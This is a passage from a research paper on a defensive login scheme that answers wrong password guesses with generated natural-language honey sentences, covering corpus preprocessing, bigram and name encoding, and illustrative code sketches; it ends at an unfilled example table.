An alternative approach that implements HE is the authentication scheme proposed by Jordan [5]. This method prevents password-guessing attacks by generating sweet words from users’ passwords and using honey words. A honey word is generated and used as a fake message for each incorrect password.
Suppose the attacker sends an incorrect password that is included in the sweet words. In this case, the corresponding fake message is returned to the attacker, and an alert is sent to the administrator. This method could give the attacker confidence that he successfully found the correct password. However, a fake message consisting of just one word could raise the attacker's suspicion. All sweet words and decoy messages are also stored in the database, so the security is limited to the number of fake messages that can be stored.

The security of HE as implemented in the prior authentication systems has to be increased to prevent password-guessing attacks. The honey message has to look natural enough to fool the attacker. The message must also be dynamically generated, so that the choice is not limited to the stored fake messages. This improvement must be achieved without restricting the users’ options in creating a password.

In this research, we propose an authentication system using a natural language-based confirmation message. The proposed method changes the confirmation message into a honey sentence written in natural language. Instead of having the unauthorized request rejected, the attacker receives a honey sentence, such that he cannot determine the correctness of the guessed password. The honey sentence is dynamically generated, such that one desired password can generate multiple types of sentences. One of these sentences is used as a seed sentence and stored in the database. The seed sentence is a sentence that is used to generate the other possible sentences for the password. Generating multiple types of sentences is proposed to hide the pattern of sentence generation.
The experimental results showed that 80.67% of the generated sentences are natural. The complexity of password guessing is increased by the number of possible honey sentences, such that the probability of finding the correct password from all possible passwords decreases.

The rest of the paper is organized as follows. Section 2 discusses the implementation details of previous methods, and Sect. 3 discusses the implementation details of the proposed method. Section 4 discusses the experimental results as well as the proposed method’s security analysis. Finally, in Sect. 5, we present our research findings and conclusion.
2 Previous Methods

This section discusses the overview and the security analysis of previous methods: a secure PIN authentication for Java smart cards proposed by Mohammed [4] and an authentication scheme using honey encryption proposed by Jordan [5].

2.1 Overview of Previous Methods

Previous methods [4, 5] prevent password-guessing attacks by generating sweet words from users’ passwords, such that the sweet words are very similar to the correct password. If the attacker tries to access the resource by sending an incorrect password included in the sweet words, a fake message is returned to the attacker, and an alert is sent to the administrator. This method consists of two phases: the sign-up phase and the login phase.

The sign-up phase aims to register users’ passwords (P) and messages (M). First, the sweet words (P’) are generated from the password and used as decoy passwords. Then, the system generates a fake message (M’) and a random number (seed) for all passwords, including the decoy passwords. Furthermore, every message is encrypted into ciphertext (C) using the corresponding seed. Finally, the correct password is mapped to the encrypted user message, while each decoy password is mapped to a fake ciphertext (C’). The result of this mapping is stored in the database. The sign-up phase of the previous method is shown in Fig. 1.
Fig. 1. Sign-up phase of the previous method.
The objective of the login phase is to authenticate the users that tried to access the resources. First, the password (P) is received from the users. Second, the corresponding seed (seed) and ciphertext (C) for the inputted password are retrieved from the database. Third, the ciphertext is decrypted into the message (M) using the seed. Finally, the correct password from users retrieves the correct ciphertext, such that the correct message is returned to users. The login phase of the previous method is shown below in Fig. 2.
Fig. 2. Login phase of the previous method.
2.2 Security Analysis of Previous Methods

The attack scenario of previous methods (Fig. 3) [4, 5] is conducted by the attacker sending an incorrect password (P’). If the incorrect password is included in the sweet words, then a fake ciphertext (C’) is retrieved and decrypted into a fake message (M’). The fake message is sent to the attacker, and an alert is sent to the administrator. Meanwhile, if the password sent by the attacker is not included in the sweet words, the system raises an error.
Fig. 3. Attack scenario of the previous method.
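The sign-up, login, and attack flows of the previous methods can be illustrated with the following sketch. It is a toy model under stated assumptions, not the implementation of [4, 5]: the decoy generator `make_sweet_words`, the XOR keystream cipher, the short list of states, and the stored decoy flag used to trigger the alert are all hypothetical choices made for this example.

```python
import hashlib
import secrets

STATES = ["Ohio", "Texas", "Utah", "Iowa"]  # tiny stand-in for a list of fake messages


def keystream_xor(data: bytes, seed: bytes) -> bytes:
    """Toy cipher: XOR with a SHA-256-derived keystream (illustration only, not secure design)."""
    stream = b""
    counter = 0
    while len(stream) < len(data):
        stream += hashlib.sha256(seed + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))


def make_sweet_words(password, count=3):
    """Hypothetical decoy generator: append a digit to the real password."""
    return [f"{password}{i}" for i in range(count)]


def sign_up(password, message):
    """Map the real password and every decoy to a (seed, ciphertext, is_decoy) record."""
    table = {}
    for i, pw in enumerate([password] + make_sweet_words(password)):
        seed = secrets.token_bytes(16)
        plain = message if i == 0 else STATES[(i - 1) % len(STATES)]
        table[pw] = (seed, keystream_xor(plain.encode(), seed), i != 0)
    return table


def login(table, password):
    """Return (message, alert); unknown passwords raise an error, as in the attack scenario."""
    if password not in table:
        raise KeyError("password not registered")
    seed, cipher, is_decoy = table[password]
    return keystream_xor(cipher, seed).decode(), is_decoy


table = sign_up("hunter", "secret note")
real_reply = login(table, "hunter")     # correct password: real message, no alert
decoy_reply = login(table, "hunter0")   # sweet word: fake message, alert raised
```

A guess outside the stored sweet words raises an error in this sketch, which reflects the weakness discussed in this section: the attacker can tell such guesses apart from stored ones.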
With respect to password-guessing attacks, the security of the previous methods depends on the probability of finding the correct password from all the possible passwords. The total number of possible passwords depends on the total number of password combinations and the number of words that can be used as a fake message. Suppose the number of possible fake messages is $n_{words}$, the length of the password in bits is $n_{bits}$, and every bit can take a value of 1 or 0. Then the probability of finding the correct password from all possible passwords and fake messages is calculated using Eq. 1.

$$P(\text{finding the correct password}) = \frac{1}{2^{n_{bits}} \cdot n_{words}} \qquad (1)$$
In the previous methods, the fake message is generated from the states of the US, such that $n_{words}$ is limited to a small number and the probability of finding the correct password is high. Furthermore, a fake message consisting of a single word raises the attacker's suspicion, especially if the word is not related to the message. The map of generated sweet words is stored in the database for all users. Errors are raised when the password is not included in the sweet words. Therefore, all possible passwords have to be stored to prevent errors. Storing just a few passwords leads to errors that draw the attacker's attention, while storing all possible passwords consumes many resources.
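As a worked illustration of Eq. 1, the following sketch evaluates the probability for a word-based decoy set and for a much larger decoy set. The 32-bit password length and the figure of one million decoys are hypothetical values chosen for the example; 50 is the number of US states.

```python
from fractions import Fraction


def guess_probability(n_bits, n_words):
    """Eq. 1: probability of finding the correct password among all passwords and fake messages."""
    return Fraction(1, 2 ** n_bits * n_words)


# Decoys drawn from the 50 US states, with a hypothetical 32-bit password.
p_states = guess_probability(n_bits=32, n_words=50)

# The same password length with a hypothetical pool of one million decoy messages.
p_large_pool = guess_probability(n_bits=32, n_words=10 ** 6)
```

Enlarging the pool of possible fake messages lowers the probability in direct proportion, which is the motivation for replacing single words with generated sentences.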
3 Proposed Method

The objective of the proposed method is to prevent password-guessing attacks. A password-guessing attack is an attack scenario in which the attacker attempts to gain access to legitimate users’ resources by guessing all possible passwords. The idea for preventing this attack is to make the attacker unable to determine the correctness of the guessed password. Therefore, instead of rejecting the unauthorized request, the system changes the confirmation message into something that is more disguised. To this end, an authentication method based on natural language is proposed, in which the confirmation message is changed into a honey sentence. The honey sentence is dynamically generated using natural language. In the proposed method, if the user is eligible, he receives a message that he can predict himself. Otherwise, he receives a fake message. The proposed scheme consists of two phases: the sign-up phase and the login phase.

The objective of the sign-up phase is to register the user’s password with the server. This phase is initiated by the user sending their password to the server. The password is encoded into a sentence in natural language. This sentence is sent back to the user and stored in the server’s database. Because it is written in natural language, users can easily remember the sentence and use it as a secret message. Moreover, this sentence does not attract attention if stored in the database and is treated as a regular sentence.

After the user successfully registers, the login phase is conducted. The objective of this phase is to authenticate the user who tries to access the resources. The user sends the password and a salt number to the server. This password is used to generate a new sentence (sentence2). Then, the server compares sentence2 with the sentence stored in the database (sentence1). A correct password produces a sentence2 that holds the same information as sentence1. When the server finds that both sentences are equal, it sends sentence2 back to the user as the confirmation message. Users can predict the confirmation sentence from the secret message and the salt. This can be used to create mutual authentication and to verify whether users are communicating with the eligible server.
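The sign-up and login phases described above can be sketched as follows. This is a simplified illustration under several assumptions: the word lists, the hash-based `encode_sentence` function, and the `database` dictionary are hypothetical; salt handling is omitted; and the sentence derived from a wrong password doubles as the honey sentence, whereas the actual encoding relies on corpus-derived lookup tables.

```python
import hashlib

# Hypothetical word lists standing in for the corpus-derived lookup tables.
SUBJECTS = ["Alice", "Brian", "Clara", "David"]
PREDICATES = ["reads", "builds", "paints", "repairs"]
OBJECTS = ["a book", "a bridge", "a portrait", "an engine"]


def encode_sentence(password: str) -> str:
    """Deterministically map a password to a subject-predicate-object sentence."""
    digest = hashlib.sha256(password.encode()).digest()
    return " ".join([
        SUBJECTS[digest[0] % len(SUBJECTS)],
        PREDICATES[digest[1] % len(PREDICATES)],
        OBJECTS[digest[2] % len(OBJECTS)],
    ])


def sign_up(database, user, password):
    """Store sentence1 for the user and return it as the user's secret message."""
    database[user] = encode_sentence(password)
    return database[user]


def login(database, user, password):
    """Return (confirmation sentence, alert flag). Every guess receives a sentence."""
    sentence2 = encode_sentence(password)
    alert = sentence2 != database[user]  # a mismatch would notify the administrator
    return sentence2, alert


database = {}
secret = sign_up(database, "user1", "correct horse")
good_reply, good_alert = login(database, "user1", "correct horse")
bad_reply, bad_alert = login(database, "user1", "wrong guess")
```

In both cases the reply is a well-formed sentence, so the reply alone does not reveal whether the guess was correct. With word lists this small, different passwords can collide on the same sentence; a realistic encoding needs a far larger sentence space.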
In the attacking scenario, an attacker tries to send a guessed password. The password is generated into one sentence, sentence2’. Further, this sentence is compared to sentence1. The server found that the information stored in sentence1 and sentence2’ are unequal. In this case, the server generates a new fake message and sends it back to the attacker. The server alerts the administrator that someone tried to intrude. Suppose the attacker does not know either the password or the secret message, then he can not determine whether the password was correct or not by only knowing the fake message he received. Since the previous methods [4, 5] generate the fake message just using one word, thus the probability of finding the correct password in the proposed method is lower than in the previous methods. The naturalness of generated sentences becomes important for achieving an undistinguishable confirmation message. To produce a sentence that looks natural, we can use the existing corpus as a reference. A natural sentence can be generated by combining words used in the corpus. These words are obtained from the corpus by parsing the sentences. The parsing method is used in the preprocessing phase and the sentence generation based on corpus word combination is used in the sign-up and login phase. The predicate and object are generated based on the Indonesian sentence corpus. Meanwhile, an English name corpus is used to generate a more flexible subject. Furthermore, the details of this proposed method are discussed in three subsections: the preprocessing phase, the sign-up phase, and the login phase. 3.1 Preprocessing Phase Based on the discussion in the previous section, the preprocessing phase is conducted to parse the sentences from the corpus. Each Indonesian language corpus sentence is parsed into words following the required syntax function. 
A syntax function of the basic sentence in the Indonesian language consists of three components: subject, predicate, and object [6]. As for the English name corpus, each name is parsed based on the syllable rule as written in the following subsection. Further, the parsed component from both corpora is mapped to create the required lookup tables. The preprocess of these corpora is further discussed in two subsections: sentence preprocessing and name preprocessing. Sentence Preprocessing. Sentence preprocessing aims to parse the sentences and create the lookup tables from the Indonesian language corpus. This process consists of two subprocesses: corpus cleaning and the bigram and sentence analysis. The corpus cleaning process is conducted to clean and parse the sentences in the corpus into two components: predicate and object. The bigram and sentence analysis aims to map every component to create three lookup tables: mapBigramGroup, mapBigramToPredicate, and mapPredicateToObject. The Indonesian sentence corpus used in this method is taken from Leipzig’s corpus [7]. This corpus contains one million sentences taken from the Wikipedia site. The details of this process are conducted as follows: Corpus Cleaning. The corpus cleaning process is initiated by removing every word not included in the Indonesian dictionary [8]. Then, every compound sentence is parsed
into basic Indonesian sentences. The parsing is performed according to the occurrence of conjunctions or punctuation marks between two sentences. Next, the word labeled as a predicate is extracted based on the syntax rules in Standard Indonesian Grammar [6]. A word is considered a predicate if it is a verb or has the affix “me-” or “ber-”. Finally, the remainder of the sentence is marked as the object of each detected predicate. Suppose the original sentence is “Perang itu berlangsung selama 524 tahun dan membentuk sejarah dunia.” (The war lasted for 524 years and shaped the history of the world.) In this sentence, two words are detected as predicates: “berlangsung” (last) and “membentuk” (shape/form). The result of cleaning and parsing this sentence is shown in Table 1.
Table 1. Example result of sentence cleaning and parsing process

| Predicate | Object |
| --- | --- |
| berlangsung (last) | selama 524 tahun (for 524 years) |
| membentuk (shape/form) | sejarah dunia (the history of the world) |
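The cleaning step above can be sketched in a few lines of Python. This is a minimal illustration, not the authors' implementation: it assumes a small hypothetical conjunction list, detects predicates by the “me-”/“ber-” affix only (the verb lookup and dictionary filtering are omitted), and the names `CONJUNCTIONS`, `split_clauses`, and `extract_pairs` are made up for this example.

```python
import re

# Assumption: a tiny illustrative conjunction list; the paper does not enumerate one.
CONJUNCTIONS = {"dan", "atau", "tetapi"}
# Affixes the text uses to flag a predicate.
PREDICATE_PREFIXES = ("me", "ber")


def split_clauses(sentence):
    """Split a compound sentence into word lists at punctuation and conjunctions."""
    clauses = []
    for part in re.split(r"[.,;!?]", sentence):
        current = []
        for word in part.split():
            if word.lower() in CONJUNCTIONS:
                if current:
                    clauses.append(current)
                current = []
            else:
                current.append(word)
        if current:
            clauses.append(current)
    return clauses


def extract_pairs(sentence):
    """Return (predicate, object) pairs, one per clause that has a predicate."""
    pairs = []
    for words in split_clauses(sentence):
        for idx, word in enumerate(words):
            if word.lower().startswith(PREDICATE_PREFIXES):
                remainder = " ".join(words[idx + 1:])
                if remainder:  # keep only predicates followed by an object
                    pairs.append((word.lower(), remainder))
                break
    return pairs


example = "Perang itu berlangsung selama 524 tahun dan membentuk sejarah dunia."
print(extract_pairs(example))
```

Applied to the example sentence, the sketch yields the two rows of Table 1. Because it relies on the affix alone, it would also mislabel non-predicate words that happen to start with the same letters.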
Bigram and Sentence Frequency Analysis. Bigram and sentence frequency analysis is conducted after the corpus has been cleaned and parsed, as follows:
1. Creating a lookup table from bigram to predicate (mapBigramToPredicate). mapBigramToPredicate maps each bigram to the group of predicates that contain it.
2. Calculating the weight of each element of the bigram map. The weight of each element is calculated based on the number of occurrences of the predicate in the corpus. The weight is used to determine the chosen predicate during the encoding process. An example of this map is shown in Table 2.
Table 2. The map of bigram to predicate

| Bigram | Predicate | Weight |
| --- | --- | --- |
| ‘be’ | “berlangsung (last)” | 3112 |
| | “membentuk (form)” | 4831 |
3. Creating a lookup table from predicate to object (mapPredicateToObject). mapPredicateToObject maps each predicate to the objects associated with it. An example of this map is shown in Table 3.
4. Creating mapBigramGroup. If a bigram is not found in any predicate, ZWC-based rules, represented by a lookup table called mapBigramGroup, are used to find the predicate. ZWC is the abbreviation of Zero Width Character, a character that is invisible in printed text. All bigrams are divided into three groups in ascending order of frequency. The first and second groups are mapped into the third group by inserting ZWCs before the first letter or the second letter of the bigram: the first group uses one ZWC, while the second uses two ZWCs. An example of this map is shown in Table 4, which is created by calculating the weights of all bigrams in Table 2. Suppose the bigram ‘aa’ is in the first group and is mapped to ‘be’ in the third group. The bigram ‘aa’ is then converted into the bigram ‘be’ with an additional ZWC before the first letter (‘[ZWC]be’) or the second letter (‘b[ZWC]e’) of ‘be’.
Table 3. The map of predicate to object

| Predicate | Object |
| --- | --- |
| Berlangsung (last) | {“Selama 524 tahun”, “Dari pukul 07”, “Hingga sekarang”, …} (“For 524 years”, “From 07 o’clock”, “Until now”, …) |
| Membentuk (form/shape) | {“Sejarah dunia”, “sebuah grup”, “pasukan pengawal”, …} (“the history of the world”, “a group”, “guard forces”, …) |
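The bigram-to-predicate map and the bigram weights can be sketched as follows. This is one reading of the analysis steps rather than the authors' code: it assumes that a bigram's weight is the sum of the corpus counts of every predicate occurrence that contains it, which happens to reproduce the weights listed in Table 4 for ‘be’, ‘ng’, ‘tu’, and ‘an’. The helper names are hypothetical.

```python
from collections import defaultdict


def word_bigrams(word):
    """All overlapping two-letter windows of a word, in order."""
    return [word[k:k + 2] for k in range(len(word) - 1)]


def build_bigram_maps(predicate_counts):
    """Build mapBigramToPredicate and per-bigram weights from predicate counts.

    predicate_counts maps a predicate word to its number of occurrences
    in the corpus (the weight shown in Table 2).
    """
    map_bigram_to_predicate = defaultdict(dict)
    bigram_weight = defaultdict(int)
    for predicate, count in predicate_counts.items():
        for bigram in word_bigrams(predicate):
            map_bigram_to_predicate[bigram][predicate] = count
            # Assumption: each occurrence of the bigram inside the word adds the count.
            bigram_weight[bigram] += count
    return dict(map_bigram_to_predicate), dict(bigram_weight)


counts = {"berlangsung": 3112, "membentuk": 4831}
mapping, weights = build_bigram_maps(counts)
print(mapping["be"])                   # predicates that contain 'be'
print(weights["be"], weights["ng"])    # 7943 6224
```

Sorting `weights` in ascending order and cutting it into three groups would then give the group column of mapBigramGroup; the cut points are not stated in the text, so they are left out here.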
Name Preprocessing. Name preprocessing parses the name corpus and creates its lookup tables. This process consists of two subprocesses: name parsing and syllable frequency analysis. Name parsing splits each name into syllables. Syllable frequency analysis creates three lookup tables: onsetList, mapOnsetToNucleus, and mapNucleusToCoda. The name corpus used in this method consists of 7944 English first names [9] and 14,674 last names [10].

Name Parsing. A syllable is a word component consisting of three parts: onset, nucleus, and coda [11]. For example, “Amanda” is parsed into three syllables: ‘a’, ‘man’, and ‘da’. The syllable ‘man’ consists of ‘m’ as the onset, ‘a’ as the nucleus, and ‘n’ as the coda. Two approaches are used in syllable parsing: one based on the English dictionary and one based on consonant and vowel rules. A name that is built from English words is first separated into those words. For example, “Harmsworth” is a last name built from two English words, so it is separated into “harms” and “worth”. Then, each part is parsed based on the consonant and vowel rules. Syllabification using consonants and vowels is conducted as follows:
1. Labeling each letter into two groups: consonants and vowels.
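Table 4. The map of bigram’s group

| Bigram | Weight | Group | Bigram pair |
| --- | --- | --- | --- |
| “aa” | 0 | 1 | “be” |
| “ab” | 0 | 1 | “ng” |
| “ac” | 0 | 1 | “uk” |
| “ad” | 0 | 1 | “tu” |
| … | … | … | … |
| “an” | 3112 | 2 | “be” |
| “er” | 3112 | 2 | “ng” |
| “gs” | 3112 | 2 | “uk” |
| “la” | 3112 | 2 | “tu” |
| … | … | … | |
| “tu” | 4831 | 3 | – |
| “uk” | 4831 | 3 | – |
| “ng” | 6224 | 3 | – |
| “be” | 7943 | 3 | – |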
2. Changing the label of each letter based on the following rules:
a. Silent “E”. The letter “e” is silent if it is placed at the end of the name and the previous letter is a consonant. The letter “e” is merged with the previous consonant and counted as one consonant.
b. Grouping vowels (diphthong). A diphthong occurs when two or more vowels form a new sound. When there is a diphthong within a name, all of its vowels are grouped into one vowel.
c. Role of “Y”. The letter “y” is considered a consonant at the beginning of the labeling process. However, if the letter “y” is placed between two consonants, its label is changed to vowel.
d. Grouping consonants. When two or more consonants form a new sound, the letters are considered one consonant. For example, “th”, “sh”, “tsk”, and “ght” are each considered one consonant.
3. Grouping the letters into syllables consisting of onset, nucleus, and coda. Syllable grouping is centered on the vowels, which act as the nucleus. Each consonant placed between two vowels has two possibilities: it is a coda for the first vowel or an onset for the second vowel. The choice is determined by the following rules:
a. One consonant between two vowels (V1 – C1 – V2). If C1 is included in the list of consonants that are commonly used to end a syllable
(“th”, “sh”, “tsk”, “ph”, “ch”, “wh”, “x”), then C1 is the coda for the first vowel (V1 C1 – V2). In other cases, C1 is the onset for the second vowel (V1 – C1 V2).
b. Two consonants between two vowels (V1 – C1 C2 – V2). C1 is the coda for V1 and C2 is the onset for V2.
c. Three consonants between two vowels (V1 – C1 C2 C3 – V2). If C1, C2, or the group C1 C2 fulfills the consonant grouping rules, then that component is the coda for V1. If there is no possible combination for C1 and C2, then C1 C2 is the coda for V1, and C3 is the onset for V2.
d. Four consonants between two vowels (V1 – C1 C2 C3 C4 – V2). Four consonants can occur sequentially if the leading three consonants (C1 C2 C3) fulfill the consonant grouping rules; that component becomes the coda for V1. If no consonant grouping is possible and one of the four consonants is the letter “s”, the letter “s” is used as a delimiter: the consonant located before the letter “s” and the letter “s” itself form the coda for V1, while the consonant located after the letter “s” is the onset for V2.

An example of the syllabification process is shown in Table 5.

Table 5. The example of the syllabification process

| Name | C-V Label | Syllable |
| --- | --- | --- |
| Annabelle | V.C \| C.V \| C.V.CC | a.n \| n.a \| b.e.lle |
| Charyl | C.V \| C.V.C | ch.a \| r.y.l |
| Harmsworth | C.V.CCC \| C.V.CC | h.a.rms \| w.o.rth |
| Hollinshed | C.V.C \| C.V.C \| C.V.C | h.o.l \| l.i.n \| sh.e.d |
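The labeling and grouping rules can be illustrated with a simplified Python sketch. It is not the authors' implementation: it treats any run of adjacent vowels as one vowel, uses only the consonant groups named in the text, and implements rules 3a and 3b only (for longer consonant runs it simply makes the last consonant the onset, which is an assumption). The dictionary-based split of compound names such as “Harmsworth” is not included, so each part is passed in separately.

```python
VOWELS = set("aeiou")
# Consonant groups named in the text, longest first so "tsk" is tried before "th"/"sh".
CLUSTERS = ("tsk", "ght", "th", "sh", "ph", "ch", "wh")
# Consonants the text lists as commonly ending a syllable (rule 3a).
CODA_CONSONANTS = {"th", "sh", "tsk", "ph", "ch", "wh", "x"}


def label_units(part):
    """Steps 1-2: split a lowercase name part into (unit, label) pairs."""
    units, k = [], 0
    while k < len(part):
        cluster = next((c for c in CLUSTERS if part.startswith(c, k)), None)
        if cluster:                      # rule 2d: grouped consonants
            units.append([cluster, "C"])
            k += len(cluster)
        elif part[k] in VOWELS:          # rule 2b (simplified): adjacent vowels merge
            end = k
            while end < len(part) and part[end] in VOWELS:
                end += 1
            units.append([part[k:end], "V"])
            k = end
        else:                            # single consonant, including "y" for now
            units.append([part[k], "C"])
            k += 1
    # Rule 2a: a final silent "e" merges into the preceding consonant.
    if len(units) >= 2 and units[-1] == ["e", "V"] and units[-2][1] == "C":
        units[-2][0] += "e"
        units.pop()
    # Rule 2c: "y" between two consonants is relabeled as a vowel.
    for idx in range(1, len(units) - 1):
        if (units[idx][0] == "y" and units[idx - 1][1] == "C"
                and units[idx + 1][1] == "C"):
            units[idx][1] = "V"
    return [tuple(unit) for unit in units]


def syllabify(part):
    """Step 3 (rules 3a and 3b only): cut the labeled units into syllables."""
    units = label_units(part.lower())
    vowels = [i for i, (_, label) in enumerate(units) if label == "V"]
    cuts = []
    for v1, v2 in zip(vowels, vowels[1:]):
        if v2 - v1 == 2:                 # rule 3a: one consonant in between
            is_coda = units[v1 + 1][0] in CODA_CONSONANTS
            cuts.append(v2 if is_coda else v1 + 1)
        else:                            # rule 3b; assumed fallback for longer runs
            cuts.append(v2 - 1)
    bounds = [0] + cuts + [len(units)]
    return ["".join(unit for unit, _ in units[s:e])
            for s, e in zip(bounds, bounds[1:])]


for name in ("Annabelle", "Charyl", "Hollinshed"):
    print(name, syllabify(name))
```

For the three single-word names in Table 5 the sketch gives the same syllable boundaries as the table; names that need rules 3c or 3d would require the fuller rule set.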
Syllable Frequency Analysis. After the syllabification process is completed, syllable frequency is analyzed as follows:
1. Calculating the occurrence of each onset across all syllables.
2. Taking the sixteen highest-frequency onsets. These onsets are used in the subsequent mapping process and saved as onsetList.
3. Creating mapOnsetToNucleus by mapping each onset to its onset–nucleus bigrams. The frequency of occurrence of each bigram is used as its weight. The weight acts as a randomization factor during the encoding process.
4. Creating mapNucleusToCoda using the same method as in step 3.

3.2 Sign-Up Phase

Based on the discussion at the beginning of Sect. 3, the objective of the sign-up phase is to register the user password with the server. In this phase, two main concepts are used: the
Discrete Logarithm Problem (DLP) [12] and the natural language encoding algorithm. The DLP is used to calculate an irreversible value (b) that serves as secret information. The natural language encoding algorithm encodes b into a natural language sentence (S). These concepts are discussed in the following subsection. The sign-up phase (see Fig. 4) begins when the user sends a password (P) to the server. P is encoded into an integer x. The server generates two numbers n and a that satisfy the requirements of the DLP, namely gcd(a, n) = 1 and a < n. The value of b is then calculated as $b = a^{x} \bmod n$. Next, b is encoded into the seed sentence (S) with salt = 0. The values of a, n, and S are stored in the database, and S is sent back to the user. S is used as the secret message and must be kept securely by the user.
Fig. 4. Sign-up phase of the proposed method.
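The numeric part of the sign-up phase can be sketched as below. Several details are assumptions made only for illustration: the text does not say how P is encoded into x, so the UTF-8 bytes of the password are read as a big-endian integer; the 24-bit size of n follows the experiment setup in Sect. 4.1; and the function names are hypothetical. The encoding of b into the seed sentence S is not shown.

```python
import math
import secrets


def password_to_int(password):
    """Assumed encoding of P into x: UTF-8 bytes read as a big-endian integer."""
    return int.from_bytes(password.encode("utf-8"), "big")


def generate_parameters(bits=24):
    """Pick n with the requested bit length and a with gcd(a, n) = 1 and a < n."""
    while True:
        n = secrets.randbits(bits) | (1 << (bits - 1))  # force the top bit
        a = secrets.randbelow(n - 2) + 2                # 2 <= a <= n - 1
        if math.gcd(a, n) == 1:
            return a, n


def compute_b(password, a, n):
    """b = a^x mod n, using Python's three-argument pow for modular exponentiation."""
    return pow(a, password_to_int(password), n)


a, n = generate_parameters()
b = compute_b("correct horse", a, n)
print(a, n, b)  # a, n (and the sentence encoding b) are what the server would store
```

The built-in `pow(a, x, n)` keeps the computation fast even though x can be a very large integer for long passwords.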
Natural Language Encoding Algorithm. Based on the discussion in the previous section, the natural language encoding algorithm encodes the value of b into a honey sentence (S). To generate the honey sentence, b is represented by bigrams, which are used to choose the words that form the final sentence. First, b is divided into a list of 8-bit chunks. Every chunk in the list is converted into a bigram representation using the hexToBigram() function. The generateSentence() function then generates a sentence based on the bigram list. This function takes the first unused bigram to choose the predicate, and a full sentence is generated based on the chosen predicate. The next bigram is also used if it can be found in the sentence. The index position of each bigram in the chosen sentence is marked and collected to create positionList. The positionList is encoded into the name using the generateName() function. The generateSentence() and generateName() functions are repeated until all of the bigrams are used. The details of this process are shown in Algorithm 1.
Algorithm 1. function encode(b, salt)
input: two integers b and salt.
output: a list of natural language sentences.
// This algorithm encodes an integer b into a list of natural language sentences based on the given salt.
hexaGroup ← divide b into 8-bit chunks
for i = 0 to length(hexaGroup) − 1 do
    bigrams[i] ← hexToBigram(hexaGroup[i])
end for
i ← 0
while i < length(bigrams) do
    firstBigrams ← bigrams[i++]
    predicateBigrams ← bigrams[i++]
    chosenSentence ← generateSentence(predicateBigrams, salt)
    nextBigrams ← bigrams[i]
    for word in chosenSentence do
        if nextBigrams is in word then
            mark nextBigrams as used
            nextBigrams ← bigrams[i++]
        end if
    end for
    positionList ← index of every bigram in chosenPredicate and chosenSentence
    name ← generateName(firstBigrams, positionList)
    finalSentence ← name + chosenSentence
    finalResults ← finalResults + finalSentence
end while
return finalResults
Furthermore, the following subsections discuss the three functions used in the proposed method: the hex-to-bigram conversion function, the sentence generation function, and the name generation function. Finally, an example of the encoding process is provided in Table 6.

Hex to Bigram Conversion Function. The hex-to-bigram conversion function (hexToBigram()) converts an 8-bit integer b into its representative list of bigrams. This function takes an 8-bit integer b as input and returns a list of bigrams. The conversion process is as follows:
1. Calculating i as $i \equiv (\lfloor b / 26 \rfloor + 10x) \bmod 26$ with $x \in \{0, 1, 2, \ldots\}$. Every letter at position i in the alphabet (counting from ‘a’ = 0) becomes a candidate for the first letter. Suppose $b = (121)_{10}$; then the possible values are i = 4, 14, 24, and the letters are {‘e’, ‘o’, ‘y’}. All of these letters are used as the first letter of a bigram.
2. Calculating j as $j \equiv b \bmod 26$. The letter at position j in the alphabet becomes the second letter. Suppose $b = (121)_{10}$; then j = 17, and the second letter of the bigram is ‘r’.
3. Combining every letter from the first and second steps to create a list of representative bigrams. In this example, possibleBigrams = {‘er’, ‘or’, ‘yr’}.
4. Converting every bigram in possibleBigrams into a zwcBigram using mapBigramGroup, which was prepared in the sentence preprocessing phase. Suppose ‘er’ is in the second group and is converted into ‘[ZWC][ZWC]ng’ (based on Table 4), and ‘or’ is in the first group and is converted into ‘k[ZWC]l’. Meanwhile, ‘yr’ is in the third group, so it does not need to be converted. Thus, the final result is possiblePairs = {‘[ZWC][ZWC]ng’, ‘k[ZWC]l’, ‘yr’}.

Sentence Generation Function. The sentence generation function (generateSentence()) generates an Indonesian sentence from the given list of predicate bigrams (possibleBigrams). This function takes b, salt, and possibleBigrams as input and returns a sentence. The process is performed as follows:
1. For every bigram in possibleBigrams, retrieving all the representative predicate words from mapBigramToPredicate, the table prepared in Sect. 3.1 that maps a bigram to its associated predicate words.
2. Choosing the predicate word at position pos, computed as $pos = (b + i) \bmod N_{predicate}$, where $N_{predicate}$ is the number of representative predicate words.
3. Based on the chosen predicate, retrieving all objects from mapPredicateToObject, the lookup table prepared in Sect. 3.1 that maps a predicate word to the rest of the associated sentence.
4. Choosing the object at position pos.
5. Returning the combination of the chosen predicate and object as the final sentence.

Name Generation Function. The name generation function (generateName()) generates an English name from the given list of integers.
In this method, this function is used to encode the list of bigram positions (positionList) in the sentence. It takes positionList and a bigram (b) as input and returns a generated name. The process is performed as follows:
1. Dividing the positions in positionList into two groups: firstNamePositionList and lastNamePositionList.
2. Converting the bigram b into a part of the name and using it as the first syllable of the first name.
3. Retrieving the onset that represents each position in the separated lists. The onset is chosen from the onsetList prepared in the preprocessing phase (Sect. 3.1).
4. Generating a syllable for every onset from step 3 by choosing a nucleus and a coda. The choice is randomized subject to a validity condition: a set of syllables is considered valid if it contains no nucleus-coda or coda-onset combination that is listed in the grouping rules.
5. Inserting a space between the two consonants whose bigram occurs least often if the length of lastNamePositionList is more than 3.
6. Returning the generated first name and last name.
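The ZWC conversion used by hexToBigram() (step 4) and its reversal can be sketched as follows. This is an illustration under stated assumptions: U+200B (zero width space) stands in for the ZWC, since the text does not name the code point; the toy map holds a few rows of Table 4; and whether the ZWCs go before the first or the second letter is passed in as a flag because the selection rule is not given. All names are hypothetical.

```python
ZWC = "\u200b"  # Assumption: zero width space used as the zero-width character

# A few rows of Table 4: bigram -> (group, bigram pair in the third group).
MAP_BIGRAM_GROUP = {
    "aa": (1, "be"),
    "er": (2, "ng"),
    "la": (2, "tu"),
    "be": (3, None),
}


def to_zwc_bigram(bigram, before_second=False):
    """Map a group-1 or group-2 bigram onto its pair, marked with 1 or 2 ZWCs."""
    group, pair = MAP_BIGRAM_GROUP[bigram]
    if group == 3:
        return bigram                     # third group is used unchanged
    marks = ZWC * group                   # group 1 -> one ZWC, group 2 -> two
    if before_second:
        return pair[0] + marks + pair[1]
    return marks + pair


def strip_zwc(zwc_bigram):
    """Return the visible bigram and the number of ZWCs that marked it."""
    return zwc_bigram.replace(ZWC, ""), zwc_bigram.count(ZWC)


encoded = to_zwc_bigram("la", before_second=True)   # 't[ZWC][ZWC]u'
print(len(encoded), strip_zwc(encoded))
```

The ZWC count recovered by `strip_zwc` is what the decoder would use, together with the reversed mapBigramGroup, to get back to the original bigram.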
Table 6. Example of encoding process using the proposed method

| Components | Values |
| --- | --- |
